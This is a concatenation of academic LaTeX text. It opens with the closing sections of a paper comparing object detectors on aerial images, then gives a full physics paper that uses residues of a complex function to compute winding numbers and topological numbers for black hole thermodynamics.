\textbf{Early backbone layers:}
As the next modification we decided to use earlier layers of the CNN backbone. We suggest that implementation of this idea may increase the performance for tiny, small and medium objects. This becomes obvious, that after resizing and passing through the first layers, receptive field of the backbone is for sure smaller, than on the latter layers. Therefore, we suggest that by the moment of reaching the Conv3 layer, the instances with the original resolution smaller than $22x22$ are almost impossible to classify, since they become a nearly 1x1 feature pixel by that layer. This might also explain the fact that the accuracy for small objects is relatively small in case of the considered ordinary Deformable DETR approach.
\begin{figure}[!ht]
\centering
\includegraphics[width=\linewidth]{Images/Dmitry/3.3_1layer.png}
\caption{Modified encoder input architecture, connected with the backbone. The Conv2-5 convolutional layers, which outputs are projected to 256 channels, are then used as inputs for the encoder part of multi-scaled attention module.}
\label{fig:1layer}
\end{figure}
Modified encoder input architecture, shown in the figure \ref{fig:1layer}, now includes the Conv2-5 backbone layers, omitting the last Conv5 layer with a stride of 2 applied previously. Since the size of added Conv2 layer is significantly larger than the size of the removed layer, the resulted model requires for more GPU memory during the training process. Having limited computing resources, we decided to decrease the batch size to 2, which significantly affected training time, increasing it from 0.8 of an hour to 3 hours per epoch.\\
\textbf{Optimised model:}
Finally, a model with the performance we were able to achieve is a combination of previously mentioned modifications to Deformable DETR. It includes Multi-scale attention module, ResNet-101 as a CNN backbone with earlier layers taken.
More specifically, the model was trained with these hyper-parameters: batch size of 6, 80 epochs, 2e-4 encoder-decoder learning rate, 2e-5 backbone learning rate, learning rate decay by 0.5 at each 7th epoch, and the loss function coefficients optimised for fine-tuning (decreased by 50 \%).
\begin{figure}[!ht]
\centering
\includegraphics[width=\linewidth]{Images/Dmitry/3.5_Final.png}
\caption{Results on the validation set using different modifications of Deformable DETR. The results for models with denoted as '-1 layer' are expected extrapolated results after training for 30 epochs. Calculation is based on the thorough observations of similar fully-trained for 80 epochs models.}
\label{fig:yolo}
\end{figure}
\section{Conclusions
After investigating of the conducted experiments with both original and modified architectures and summarising different performance metrics observed for all three considered approaches, we can provide a model-based conclusion for each of them, mentioning their successes and fails.
Starting with Faster R-CNN we noticed that the architecture shows good precision and recall values on small objects and outstanding results on medium-sized [$P_m: 0.476, R_m:0.684$] (harbor, storage tank, bridge), however it performs quite bad on large ones [$P_l: 0.19$].
Next, YOLOv5, in turn, demonstrates the best precision on small objects [$P_s: 0.46$] (helicopter, large vehicle, baseball diamond) and good values for the small ones, but unacceptably low precision and recall for the large ones [$P_l: 0.13, R_l: 0.25$].
And finally, attention-based Deformable DETR, shows the superior performance indicators for the large objects [$P_l: 0.476, R_l:0.684$] and good values for the medium-sized, however performing worse on the small ones [$P_s: 0.22, R_s: 0.32$].
To conclude, the aerial object detection is certainly a challenging task, providing multiple complex questions to solve. Through our experiments, we tried to analyse the strengths and weaknesses of different types of detectors on the aerial images from iSAID dataset. The observed variety of outcomes and performance of models shows that the object detection problem already can be adequately solved with a certain highly dataset-depended solution, but it still does not have a single approach that can provide a general solution for every case.
{\small
\bibliographystyle{ieee}
| 2024-02-18T23:40:18.274Z | 2022-11-29T02:27:10.000Z | algebraic_stack_train_0000 | 2,003 | 5,529 |
|
proofpile-arXiv_065-9806 | \section{Introduction}
The topological defect is a universal pattern of nature and plays a fundamental role in providing stability information against perturbation for systems from liquid crystals to particle physics \cite{Fumeron:2022gcd}. The study of topological properties in strong gravity systems beyond in quantum many-body systems can be traced back to \cite{Cunha:2017qtt,Cunha:2020azh,Guo:2020qwk}, where the existence of at least one light ring around the four-dimensional stationary non-extremal rotating black hole was proved. Recently, exploring thermodynamics of black holes via topological properties has charted a way for deepening our recognition of intrinsic characteristics of spacetime \cite{Wei:2021vdx,Yerra:2022alz,Fan:2022bsq}. The topologies merit neglecting the details of objects and just concerns with their generic properties. To investigate the thermodynamic topology properties of black holes as solutions of Einstein gravitational field equation, one has to identify the solutions as topological thermodynamic defects in the thermodynamic parameter space which can be constructed in the generalized off-shell free energy landscape \cite{Wei:2022dzw}.
In the standard definition of free energy, the Hawking temperature is invariant for a canonical ensemble containing states of black holes with various radii. The generalized concept of free energy was raised in Ref. \cite{York:1986it} and was recently used to study the thermodynamics of the five-dimensional Schwarzschild black hole in Ref. \cite{Andre:2020czm}. In the generalized landscape of free energy, a canonical ensemble containing different black hole states characterized by the horizon radii is endowed with an ensemble temperature fluctuating around the Hawking temperature. As a result, in the generalized free energy landscape, one has on-shell free energy states when the ensemble temperature equals to the Hawking temperature and off-shell free energy states when the ensemble temperature deviates from the Hawking temperature. The former one saturates the Einstein field equation whilst the latter one violates it \cite{Liu:2022aqt}. Notice, however, that the extremal points of the free energy can recover the on-shell states as the thermodynamic first law of the black hole is satisfied there. Locally, a minimum (maximum) point on the landscape of free energy corresponds to a stable (unstable) thermodynamic state of the black hole, as the specific heat there is positive (negative). Globally, thermodynamically stable black hole occupies a minimal point in the landscape of free energy \cite{Hawking:1982dh,Kubiznak:2012wp}. Researches along this line include Ref. \cite{Li:2022oup} for the proposal of a generalized free energy landscape for the Anti-de Sitter (AdS) black holes and Refs. \cite{Li:2020khm,Li:2020nsy,Liu:2021lmr} for the dynamical phase transition of spherically symmetric black holes.
The aim of this paper is to propose an alternative way to investigate the thermodynamic topologies of black holes beyond the topological current method. In \cite{Wei:2022dzw}, Duan's topological current method was introduced to calculate the winding number and the topological number of black holes as thermodynamic defects in the generalized free energy landscape. We observe that the winding numbers and topological numbers can be calculated by employing residues of the singular points of a characterized complex function constructed from the off-shell free energy. The method of residue can recover results obtained by the topological current method. Interestingly, it can also be used to discern generation, annihilation, and critical points. We arrange the paper as follows. In Sec. \ref{sec:gen}, we will give a brief review of the generalized landscape of free energy and introduce the residue method of investigating the local and global topological properties of the black hole solutions. In Sec. \ref{sec:ttbh}, we will apply the residue method to study the topological properties of Schwarzschild black holes, Reissner-Nordström (RN) black holes, RN-AdS black holes, and the black holes in non-linear electrodynamics. Sec. \ref{sec:con} will be devoted to our closing remarks.
\section{Generalized landscape of free energy}\label{sec:gen}
We shall take the partition function $\mathcal{Z}$ using the first-order Euclidean action $\mathcal{I}$ including a subtraction term \cite{Gibbons:1976ue},
\begin{equation}
\mathcal{Z}(\beta)=e^{-\beta F}=\int D[g] e^{-\frac{\mathcal{I}}{\hbar}} \sim e^{-\frac{\mathcal{I}}{\hbar}},
\end{equation}
where the Euclidean gravitational action $\mathcal{I}$ reads \cite{Li:2022oup}
\begin{equation}
\mathcal{I}=\mathcal{I}_1-\mathcal{I}_{\text {subtract }}=-\frac{1}{16 \pi} \int \sqrt{g} R d^4 x+\frac{1}{8 \pi} \oint \sqrt{\gamma} K d^3 x+\mathcal{I}_{\textrm{matt}}-\mathcal{I}_{\text {subtract }}.
\end{equation}
$\beta$ is the inverse of temperature or Euclidean time period, $K$ is the trace of extrinsic curvature tensor defined on the boundary with an induced metric $\gamma_{ij}$ and the determinant of this metric is $\gamma$. We use the saddle point approximation (semi-classical approximation) which allows us to evaluate the partition function on the Euclidean fluctuating black hole with fixed event horizon radius $r_+$ (which is the order parameter) and fixed ensemble temperature $T=\beta^{-1}$ (which is the temperature of the thermal environment and thus independent of the order parameter $r_+$ and adjustable). $\mathcal{I}_{\textrm{matt}}$ stands for the contribution from matter like the electromagnetic field. For the asymptotically AdS spacetime, the partition function can be evaluated just via the Einstein-Hilbert action
\begin{equation}
\mathcal{I}_E=-\frac{1}{16 \pi} \int\left(R+\frac{6}{L^2}\right) \sqrt{g} d^4 x+\mathcal{I}_{\textrm{matt}}
\end{equation}
on the Euclidean gravitational instanton with the conical singularity \cite{Li:2022oup}, where $L$ is the AdS radius. The spacetime solution of the action turns asymptotically flat from AdS in the limit $L\to\infty$.
The thermodynamic energy and entropy of the system are respectively
\begin{equation}
E=\partial_\beta \mathcal{I},
\end{equation}
\begin{equation}
S=\left(\beta \partial_\beta \mathcal{I}-\mathcal{I}\right).
\end{equation}
Then the generalized free energy of the system can be defined as
\begin{equation}
\mathcal{F}=E-\frac{S}{\tau},
\end{equation}
where the parameter $\tau$ owns the same dimension with the ensemble temperature $T$. Note that for the AdS black hole the thermodynamic energy $E$ is in fact the enthalpy $H$ \cite{Kubiznak:2016qmn,Kastor:2009wy,Chamblin:1999tk}. The on-shell free energy landscape is that
\begin{equation}
\tau=\frac{1}{T},
\end{equation}
which renders that the black hole solution satisfies the Einstein equation
\begin{equation}\label{eineq}
\mathcal{E}_{\mu \nu} \equiv G_{\mu \nu}-\frac{8 \pi G}{c^4} T_{\mu \nu}=0,
\end{equation}
where $G_{\mu\nu}$ is the Einstein tensor of the spacetime background geometry, $T_{\mu\nu}$ is the energy-momentum tensor of matter. In the off-shell landscape where the field equation is violated, $\tau$ deviates from $T^{-1}$, which means that the temperature of the canonical ensemble fluctuates.
As pointed out in \cite{Wei:2022dzw}, at the point $\tau=1/T$, we have
\begin{equation}\label{dep}
\frac{\partial \mathcal{F}}{\partial r_{\mathrm{h}}}=0.
\end{equation}
Then a vector field $\phi$ is constructed there as \footnote{We also have $$\frac{\partial \mathcal{F}}{\partial S}=0,$$ so we can also construct a vector field as $$\phi=\left(\frac{\partial \mathcal{F}}{\partial S},-\cot \Theta \csc \Theta\right).$$}
\begin{equation}\label{phid}
\phi=\left(\frac{\partial \mathcal{F}}{\partial r_{\mathrm{h}}},-\cot \Theta \csc \Theta\right),
\end{equation}
where $0 \leq \Theta \leq \pi$ is an additional introduced parameter. Then using Duan's $\phi$-mapping topological current theory \cite{Duan:2018oup}, the local winding number of the topological defects at the points $\tau=1/T$ can be calculated, and the global topological number of the black hole solution is obtained by adding those winding number at each defect in \cite{Wei:2022dzw}. We can see that to do this calculation, an extension of the dimension of parameter space is needed and one should choose an auxiliary parameter $\Theta$ to construct a function $-\cot \Theta \csc \Theta$. Principally, the selection of the function can be arbitrary. The quintessential ingredient is to construct a plane so that a real contour can be introduced to enclose the thermodynamic defects defined by Eq. (\ref{dep}).
This is reminiscent of the contour integral of a complex function $\mathcal{R}(z)$ which is analytic except at a finite number of isolated singular points $z_1, z_2, \ldots, z_m$ interior to $C$ which is a positively oriented simple closed contour. The complex function is defined within and on the contour $C$. According to the residue theorem,
\begin{equation}
\oint_C \frac{\mathcal{R}(z)}{2\pi i} d z= \sum_{k=1}^m \operatorname{Res}\left[\mathcal{R}\left(z_k\right)\right].
\end{equation}
Inspired by this, we first solve $\partial_{r_h}\mathcal{F}=0$
and obtain
\begin{equation}
\tau=\mathcal{G}(r_h),
\end{equation}
then we define a characterized complex function $\mathcal{R}(z)$ related with the generalized free energy,
\begin{equation}\label{cf}
\mathcal{R}(z)\equiv\frac{1}{\tau-\mathcal{G}(z)},
\end{equation}
where we substitute the real variable $r_h$, {\it i.e.}, the event horizon radius, with a complex variable $z$. It means that we have extended to the complex plane $\mathbb{C}$ with a complex number defined by $z=x+ i y$ with $x, y\in \mathbb{R}$. We will see that the defect points previously defined by $\phi=0$ [cf. (\ref{phid})] on the real plane now turn into isolated singular points of the characterized complex function $\mathcal{R}(z)$ on the complex plane.
Then as shown in Fig. \ref{fig1x}, every real singular point, being a thermodynamic defect, can be endowed with an arbitrary contour $C_i$ enclosing it (not enclosing other singular points). The complex function $\mathcal{R}(z)$ is analytic on and within the contour $C_i$ except at the singular point. Then we can use the residue theorem to calculate the integral of the function $\mathcal{R}(z)$ along the path $C_i$ enclosing $z_i$; And according to the Cauchy-Goursat theorem [see (\ref{caug}) below], the integral of $\mathcal{R}(z)/2\pi i$ winding the singular points along the contour $C$ is equivalent to the integrals of $\mathcal{R}(z)$ along $C_i$ the interior enclosing $z_i$.
\begin{figure}[htpb!]
\begin{center}
\includegraphics[width=5.3in,angle=0]{con.pdf}
\end{center}
\vspace{-5mm}
\caption {A schematic diagram showing the contour integral of a function which is analytic except at finite isolated singular points $z_i$ along paths $C$ and $C_i$.}\label{fig1x}
\end{figure}
This inspires us to reflect the winding number by using the residue of the complex function $\mathcal{R}(z)$ at its pole point, which is at the same time the topological defect corresponding to an on-shell black hole solution. To extract the information of the topology for the local defect point, we just need to normalize the residue, obtaining the winding number $w_i$ of a singular point $z_i$ as
\begin{equation}\label{wind}
w_i =\frac{\textrm{Res}\mathcal{R}(z_i)}{|\textrm{Res}\mathcal{R}(z_i)|}=\textrm{Sgn}[\textrm{Res}\mathcal{R}(z_i)],
\end{equation}
where $|\,|$ means to get the absolute value of the complex function, and $\textrm{Sgn}(x)$ stands for the sign function, which returns the sign of the real number and it gives $0$ if $x=0$. Here we should point out that as the singular points we care about are real, so we have $\textrm{Res}\mathcal{R}(z_i)\in\mathbb{R}$. Then the global topological number $W$ of the black hole spacetime can be obtained as
\begin{equation}\label{topw}
W=\sum_i w_i.
\end{equation}
This can be explained by applying the Cauchy-Goursat theorem, which makes an integral of the complex function around an exterior contour that can be broken up into integral of simple interior closed contours enclosing singular points. So for the case shown in Fig. \ref{fig1x}, we have
\begin{equation}\label{caug}
\oint_C \mathcal{R}(z) d z= \sum_i \oint_{C_i} \mathcal{R}(z) d z.
\end{equation}
Calculating the winding number for the thermodynamic defects through residues enables us to deal with the different kinds of isolated singular points and discern them. This especially makes it possible to calculate the winding number of a pole of order above 1, which may be a generation point, annihilation point, or critical point. To see how these work, we will exemplify them in what follows by calculating the thermodynamic topologies of typical black hole solutions of Einstein equations (\ref{eineq}).
\section{Thermodynamic topologies of black holes}\label{sec:ttbh}
\subsection{Schwarzschild black hole}
We set the four-space metric as
\begin{equation}\label{met}
d s^2={-f(r) d t^2+ \frac{d r^2}{f(r)} } +r^2 d \theta^2+r^2 \sin ^2 \theta d \phi^2 .
\end{equation}
For a Schwarzschild black hole, $f(r)=1-\frac{2M}{r}$. The event horizon is at $r_h=2M$. The thermodynamic energy and entropy of the system are respectively
\begin{equation}
E=M,
\end{equation}
\begin{equation}
S=4 \pi M^2.
\end{equation}
For the Schwarzschild black hole, according to the definition (\ref{cf}), we can explicitly obtain a characterized rational complex function
\begin{equation}
\mathcal{R}_S(z)=\frac{1}{\tau-4\pi z},
\end{equation}
which is analytic away from an isolated pole of order 1 point
\begin{equation}
z_1=\frac{\tau}{4\pi}.
\end{equation}
According to the residue theorem, if we choose a contour $C_1$ around the pole $z_1$ [cf. Fig. \ref{fig1x}], then we will have
\begin{equation}
\textrm{Res}\mathcal{R}_S (z_1)=-\frac{1}{4\pi},
\end{equation}
which is non-zero. Otherwise, if we choose another contour, say $C_2$ which does not enclose $z_1$ in Fig. \ref{fig1x}, we will obtain
\begin{equation}
\oint_{C_2} \frac{\mathcal{R}_S(z)}{2\pi i} d z= 0.
\end{equation}
Obviously, according to Eqs. (\ref{wind}) and (\ref{topw}), we have
\begin{equation}
w_0=1, W=1
\end{equation}
for the Schwarzschild black hole solution.
\subsection{Reissner-Nordström black hole}
For the Reissner-Nordström (RN) black hole, we have
\begin{equation}
f(r)=1-\frac{2M}{r}+\frac{Q^2}{r^2}
\end{equation}
in the metric (\ref{met}), where $Q$ is the electric charge. The generalized off-shell free energy of the system is
\begin{equation}\label{rrn}
\mathcal{F}=\frac{ r_h^2+ Q^2}{2 r_h}-\frac{\pi r_h^2}{\tau }.
\end{equation}
According to the definition (\ref{cf}), the characterized rational complex function can be written as
\begin{equation}\label{rrn}
\mathcal{R}_{RN}(z)=\frac{Q^2-z^2}{\tau \left(Q^2-z^2\right)+4 \pi z^3}.
\end{equation}
Applying the fundamental theorem of algebra,\footnote{Any polynomial
$$
p(x)=a_0+a_1 x+\cdots+a_n x^n, \quad a_n \neq 0
$$
can be factored completely as
$$
p(x)=a_n\left(x-z_1\right)\left(x-z_2\right) \cdots\left(x-z_n\right),
$$
where the $z_i$ are roots (which may be complex or real).}
we can write Eq. (\ref{rrn}) as
\begin{equation}
\mathcal{R}_{RN}(z)=\frac{Q^2-z^2}{4\pi (z-z_1)(z-z_2)(z-z_3)}.
\end{equation}
Root analysis shows that, for $0<\tau<6\sqrt{3}\pi Q$, we have only one real negative root, say $z_3$, so the on-shell condition cannot be satisfied. For the case of $\tau>6\sqrt{3}\pi Q$, we have \footnote{for $\tau\gg 1$, $z_1/Q\to 1^+$, and $z_1\ll z_2$. The extremal RN black hole corresponds to the case $\tau\to\infty$. Note that the condition $z_1>Q$ is important for the calculation of the residue.}
\begin{equation}
0<z_1<z_2\in\mathbb{R},\, \textrm{and}\,\, 0>z_3\in\mathbb{R}.
\end{equation}
Then according to the definition of the winding number Eq. (\ref{wind}), we have
\begin{equation}\label{rnr3}
w_1=1,\, w_2=-1.
\end{equation}
Thus according to Eq. (\ref{topw}), the topological number of the RN black hole is
\begin{equation}
W=0.
\end{equation}
What we should pay special attention to is the case $\tau=6\sqrt{3}\pi Q$, for which we have
\begin{equation}
0<z_1=z_2\in\mathbb{R},\, \textrm{and}\,\, 0>z_3\in\mathbb{R}.
\end{equation}
So we get a second-order pole of the function $\mathcal{R}_{RN}(z)$, for which we denote as $z_{12}$. Then the characterized function can be explicitly written as
\begin{equation}
\mathcal{R}_{RN}(z)=\frac{Q^2-z^2}{4\pi (z-z_{12})^2 (z-z_3)}.
\end{equation}
$z_{12}$ is a generation point as has been pointed out in Ref. \cite{Wei:2022dzw}. Here we can also give the winding number at this special point by calculating the residue of the analytic function at this pole of order 2 as
\begin{equation}\label{rnr2}
w_{1,2}=-1.
\end{equation}
This is a different result from \cite{Wei:2022dzw}, where the winding number of this generation point is $0$. This means that the winding number of the generation point is definition-dependent. So does it for the annihilation point as we will see below.
\subsection{RN-AdS black hole}
For the RN black hole with a negative cosmological constant $\Lambda$, we have the metric function in Eq. (\ref{met}) as
\begin{equation}\label{metads}
f(r)=1-\frac{2M}{r}+\frac{Q^2}{r^2}+\frac{r^2}{L^2},
\end{equation}
where $L$ is the AdS length scale, relating with the negative cosmological constant through a relation $\Lambda=-3/L^2$. The generalized off-shell free energy of the system is
\begin{equation}\label{rrnx}
\mathcal{F}=\frac{-\Lambda r_h^4+3 r_h^2+3 Q^2}{6 r_h}-\frac{\pi r_h^2}{\tau }.
\end{equation}
According to the definition (\ref{cf}), we have the generalized characterized complex function
\begin{equation}
\mathcal{R}_{RN-AdS}(z)=\frac{Q^2+\Lambda z^4-z^2}{\tau \left(Q^2+\Lambda z^4-z^2\right)+4 \pi z^3}.
\end{equation}
Based on the fundamental theorem of algebra as aforementioned, Eq. (\ref{rrnx}) can be rewritten as
\begin{equation}
\mathcal{R}_{RN-AdS}(z)=\frac{Q^2+\Lambda z^4-z^2}{\tau\Lambda (z-z_1)(z-z_2)(z-z_3)(z-z_4)}\equiv\frac{Q^2+\Lambda z^4-z^2}{\mathcal{A}(z)},
\end{equation}
where we have defined a polynomial function $\mathcal{A}(z)$ for brevity.
\begin{figure}[htpb!]
\begin{center}
\includegraphics[width=5.3in,angle=0]{root_rnads.pdf}
\end{center}
\vspace{-5mm}
\caption {Roots of the polynomial equation $\mathcal{A}(z)=0$ with $Q=1,\,\Lambda=-8\pi\times 0.0022$.}\label{fig1}
\label{root_rnads}
\end{figure}
First, we focus on the case where there are four distinct real roots. One of the roots, suppose it is $z_4$, is negative, and another three real roots satisfy the relation $z_1<z_2<z_3$, as shown in Fig. \ref{root_rnads}. As the fourth term in Eq. (\ref{metads}) is positive, we can deduce that $r_h>M>Q$, or else there will be no horizon. So we have $z_1>Q$. In this case, we have the local winding numbers
\begin{equation}
w_1=1,\,w_2=-1,\,w_3=1
\end{equation}
by using Eq. (\ref{wind}). Then we obtain
\begin{equation}
W=w_1+w_2+w_3=1
\end{equation}
for the global topological number of the RN-AdS black hole.
Notice that in the above analysis we do not need to give a specific range of the value of $\tau$ and the residue can be calculated under the condition $\tau>0$. However, in fact there should be a range for $\tau\in (\tau_{\textrm{b}},\,\tau_{\textrm{t}})$ where there are four real roots.
For $\tau<\tau_{\textrm{b}}$, as shown in Fig. \ref{root_rnads}, there is only one real positive root, say, $z_3$, then we have the local winding number of that point,
\begin{equation}
w_3=1,
\end{equation}
whist the global topological number of the black hole is
\begin{equation}
W=1.
\end{equation}
For $\tau>\tau_{\textrm{b}}$, as shown in Fig. \ref{root_rnads}, there is still only one real positive root, say, $z_1$. Then we have the local winding number of that point being
\begin{equation}
w_1=1,
\end{equation}
and the global topological number is still
\begin{equation}
W=1.
\end{equation}
So we can know that the topological number of the RN-AdS black hole is always $W=1$.
For $\tau=\tau_{\textrm{b}}, \tau_{\textrm{t}}$, we will have $z_1=z_2$, and $z_2=z_3$ respectively. We denote the two merging points by $z_{1,2}$ and $z_{2,3}$, which are the generation point and annihilation point, respectively. For the former case, we have
\begin{equation}
\mathcal{R}_{RN-AdS}(z)=\frac{Q^2+\Lambda z^4-z^2}{\tau\Lambda (z-z_{1,2})^2 (z-z_3)(z-z_4)},
\end{equation}
where $z_{1,2}$ is a root of multiplicity 2.
Then by Eq. (\ref{wind}), we should calculate the residue of a pole of order 2, yielding the winding number at this point as
\begin{equation}
w_{1,2}=-1.
\end{equation}
For the latter case, we have
\begin{equation}
\mathcal{R}_{RN-AdS}(z)=\frac{Q^2+\Lambda z^4-z^2}{\tau\Lambda (z-z_{1}) (z-z_{2,3})^2(z-z_4)},
\end{equation}
by which we should calculate the second-order pole point $z_{2,3}$, which yields
\begin{equation}
w_{2,3}=1.
\end{equation}
Combining with the result for RN black hole in Eq. (\ref{rnr2}), we see that the residue method gives different local topological properties for the generation point and annihilation point, each with a negative and positive winding number, respectively. The topological current method used in \cite{Wei:2022dzw} gives winding number 0 for both the two kinds of points, since the necessity of current conservation.
There is another possibility of $z_1=z_2=z_3$, which corresponds to the critical case and we just name the root of multiplicity 3 as a critical point. For consistency of analysis together with the case of black holes in non-linear electrodynamics below, we will discuss it in the closing remarks [cf. Eq. (\ref{z123})].
\subsection{Black holes in non-linear electrodynamics}
Now we consider the black hole solutions in non-linear electrodynamics with an action
\begin{equation}
S=\int d^4 x \sqrt{-g}\left(R-2 \Lambda-\sum_{i=1}^{\infty} \alpha_i\left(F^2\right)^i\right),
\end{equation}
where $\alpha_i$ are dimensional coupling constants and $F^2\equiv F_{\mu\nu}F^{\mu\nu}$ with $F_{\mu\nu}$ the electromagnetic tensor. The black hole solution is \cite{Gao:2021kvr,Tavakoli:2022kmo}
\begin{equation}
\begin{aligned}
d s^2 &=-U(r) d t^2+\frac{1}{U(r)} d r^2+r^2 d \Omega_2^2, \\
A_\mu &=[\Phi(r), 0,0,0],
\end{aligned}
\end{equation}
where
\begin{equation}
\Phi=\sum_{i=1}^{\infty} b_i r^{-i}, \quad U=1+\sum_{i=1}^{\infty} c_i r^{-i}+\frac{r^2}{l^2}.
\end{equation}
For $\alpha_i \neq 0$ with $i \leq 7$, we can write them explicitly as
\begin{equation}
\Phi=\frac{Q}{r}+\frac{b_5}{r^5}+\frac{b_9}{r^9}+\frac{b_{13}}{r^{13}}+\frac{b_{17}}{r^{17}}+\frac{b_{21}}{r^{21}}+\frac{b_{25}}{r^{25}},
\end{equation}
\begin{equation}
\begin{aligned}
U=&-\frac{2 M}{r}+\frac{Q^2}{r^2}+\frac{b_5 Q}{2 r^6}+\frac{b_9 Q}{3 r^{10}}+\frac{b_{13} Q}{4 r^{14}} \\
&+\frac{b_{17} Q}{5 r^{18}}+\frac{b_{21} Q}{6 r^{22}}+\frac{b_{25} Q}{7 r^{26}}+\frac{r^2}{l^2}
\end{aligned}
\end{equation}
with $b_i=0$ for $i>25$. With $\alpha_1=1$, we have
\begin{equation}
c_1=-2 M \quad c_i=\frac{4 Q}{i+2} b_{i-1}, \quad \text { for } \quad i>1,
\end{equation}
where
\begin{equation}
b_1=Q, \quad b_5=\frac{4}{5} Q^3 \alpha_2, \quad b_9=\frac{4}{3} Q^5\left(4 \alpha_2^2-\alpha_3\right),
\end{equation}
\begin{equation}
b_{13}=\frac{32}{13} Q^7\left(24 \alpha_2^3-12 \alpha_3 \alpha_2+\alpha_4\right),
\end{equation}
\begin{equation}
b_{17}=\frac{80}{17} Q^9\left(176 \alpha_2^4-132 \alpha_2^2 \alpha_3+16 \alpha_4 \alpha_2+9 \alpha_3^2-\alpha_5\right),
\end{equation}
\begin{equation}
\begin{aligned}
b_{21}=& \frac{64}{7} Q^{11}\left(1456 \alpha_2^5+234 \alpha_3^2 \alpha_2+208 \alpha_4 \alpha_2^2-24 \alpha_4 \alpha_3\right.\\
&\left.-1456 \alpha_2^3 \alpha_3-20 \alpha_5 \alpha_2-\alpha_6\right),
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
b_{25}=&\frac{448}{25} Q^{13}\left(13056 \alpha_2^6+2560 \alpha_2^3 \alpha_4-720 \alpha_3 \alpha_2 \alpha_4\right. \\
&+16 \alpha_4^2-300 \alpha_2^2 \alpha_5+4320 \alpha_3^2 \alpha_2^2-16320 \alpha_2^4 \alpha_3 \\
&\left.-24 \alpha_6 \alpha_2-135 \alpha_3^3+30 \alpha_3 \alpha_5-\alpha_7\right).
\end{aligned}
\end{equation}
\begin{figure}[htpb!]
\begin{center}
\includegraphics[width=5.5in,angle=0]{ne.pdf}
\end{center}
\vspace{-5mm}
\caption {Positive real roots of the polynomial equation $\mathcal{A}(z)=0$ with $P=0.0006737,\,Q=2.4544565,\,\alpha_2=-5.3439180,\,\alpha_3=72.4523175,\,\alpha_4=-1248.4241037,\,\alpha_5=23241.5416893,\,\alpha_6=431538.2300431,\,\alpha_7=7.4168150\times 10^6,\,\tau=52.2102945$. We denote the roots as $z_1=3.0901936,\,z_2=3.1412747,\,z_3=3.2262569,\,z_4=3.3377906,\,z_5=3.47789817,\,z_6=3.6125760,\,z_7=3.7636139,\,z_8=3.8678889,\,z_9=3.9493271 $ which correspond to blue points from left to right in the diagram. Besides, there is one another real root not shown whose locus is $z_{10}=-2.3623414$.}\label{fig1}
\label{root_ne}
\end{figure}
The entropy and mass of the black hole is \cite{Tavakoli:2022kmo}
\begin{equation}
S=\pi r_{h}^2,
\end{equation}
\begin{equation}
M=\frac{b_5 Q}{4 r_h^5}+\frac{b_9 Q}{6 r_h^9}+\frac{b_{13} Q}{8 r_h^{13}}+\frac{b_{17} Q}{10 r_h^{17}}+\frac{b_{21} Q}{12 r_h^{21}}+\frac{b_{25} Q}{14 r_h^{25}}+\frac{4}{3} \pi P r_h^3+\frac{Q^2}{2 r_h}+\frac{r_h}{2}.
\end{equation}
Then we have the generalized off-shell free energy of the system as
\begin{equation}
\mathcal{F}=M-\frac{S}{\tau},
\end{equation}
which yields a characterized rational function \footnote{One subtle point here is that if we do a transformation $$\mathcal{A}(z)\to -\mathcal{A}(z),$$ then both the winding number and topological number will change sign. We here choose the sign of $\mathcal{A}(z)$ as it can be reduced to the RN-AdS case in the vanishing $\alpha_i$ limit.}
\begin{equation}
\mathcal{R}_{NE}(z)\equiv\frac{\mathcal{B}(z)}{\mathcal{A}(z)},
\end{equation}
where
\begin{equation}
\begin{aligned}
\mathcal{A}(z)=&-350 b_5 Q \tau z^{20}-420 b_9 Q \tau z^{16}+1120 \pi P \tau z^{28}-140 Q^2 \tau z^{24}-560 \pi z^{27}+140 \tau z^{26}\\&-500 b_{25} Q \tau -455 b_{13} Q \tau z^{12}-476 b_{17} Q \tau z^8-490 b_{21} Q \tau z^4,
\end{aligned}
\end{equation}
\begin{equation}
\begin{aligned}
\mathcal{B}(z)=&-350 b_5 Q z^{20}-420 b_9 Q z^{16}-455 b_{13} Q z^{12}-476 b_{17} Q z^8-490 b_{21} Q z^4-500 b_{25} Q\\&+1120 \pi P z^{28}-140 Q^2 z^{24}+140 z^{26}.
\end{aligned}
\end{equation}
As explained in the captain of Fig. \ref{root_ne}, we can calculate the local winding number of each positive real root by Eq. (\ref{wind}),
\begin{equation}
w_{2k-1}=1,\,w_{2k}=-1,\,w_9=1,\quad k=1, 2, 3, 4.
\end{equation}
As a result, we have the global topological number
\begin{equation}
W=\sum_{i=1}^{9}w_i=1.
\end{equation}
This is the same with the RN-AdS black hole case. However, there will be a different number of generation/annihilation points. If we denote $w_{i,j}$ as the merging of roots $z_i$ and $z_j$, we will have merging points $w_{i,i+1}, (i=1,2,\ldots,8) $, and the winding number of them are
\begin{equation}
w_{2k-1,2k}=-1, w_{2k,2k+1}=1, k=1,2,3,4.
\end{equation}
We can identify them individually as generation points and annihilation points.
\section{Closing remarks}\label{sec:con}
In this paper, we proposed a new formulation to study the thermodynamic topology properties of black holes. In the generalized free energy landscape, we defined a characterized complex function (\ref{cf}) based on the off-shell free energy of the black hole. Instead of applying Duan's topological current theory \cite{Wei:2022dzw}, we perform contour integrals around singular points of the defined complex function, which according to the residue theorem can be conducted by calculating the residues of those singular points. Local topological properties are closely related to the winding numbers of isolated poles of order 1, which can be conducted by applying (\ref{wind}). With our definition, positive and negative winding numbers stand for a locally stable black hole with positive specific heat and a locally unstable black hole with negative specific heat. The global topological number of a black hole, which can be used to discern spacetime categories, can be obtained by adding all winding numbers of each singular point. We have exemplified our residue method by studying winding numbers and topological numbers for Schwarzschild black holes, RN black holes, and RN-AdS black holes. Obtained results are consistent with those in \cite{Wei:2022dzw}. Moreover, we have also studied the thermodynamic topological properties of black holes in non-linear electrodynamics and found that winding numbers of locally stable (unstable) black hole branches are always positive (negative). And we also found that the non-linear electromagnetic field does not change the global topological properties of the AdS black hole, holding its topological number the same as that of the RN-AdS black hole.
Surprisingly, the representation of topological properties for the generation and annihilation points can be quite different upon using Duan's topological current method and the residue method. The former one yields a winding number 0 for both generation and annihilation points whilst the latter one gives a winding number -1 for the generation point and 1 for the annihilation point, respectively. Duan's topological current is conserved so a 0 winding number at both the generation and annihilation points is inevitable. However, in the residue method, the generation and annihilation points are roots of multiplicity 2. So when calculating the residue of such poles of order 2, the derivatives of the characteristic function constructed from the off-shell free energy are involved. Due to the sign of the derivative of the characteristic function of a generation point being contrary to that of an annihilation point, it is not difficult to understand that we get different winding numbers for the two kinds of points. It is this different representation of the topological properties for the generation and annihilation points that makes the residue method an effective complement of Duan's topological current method.
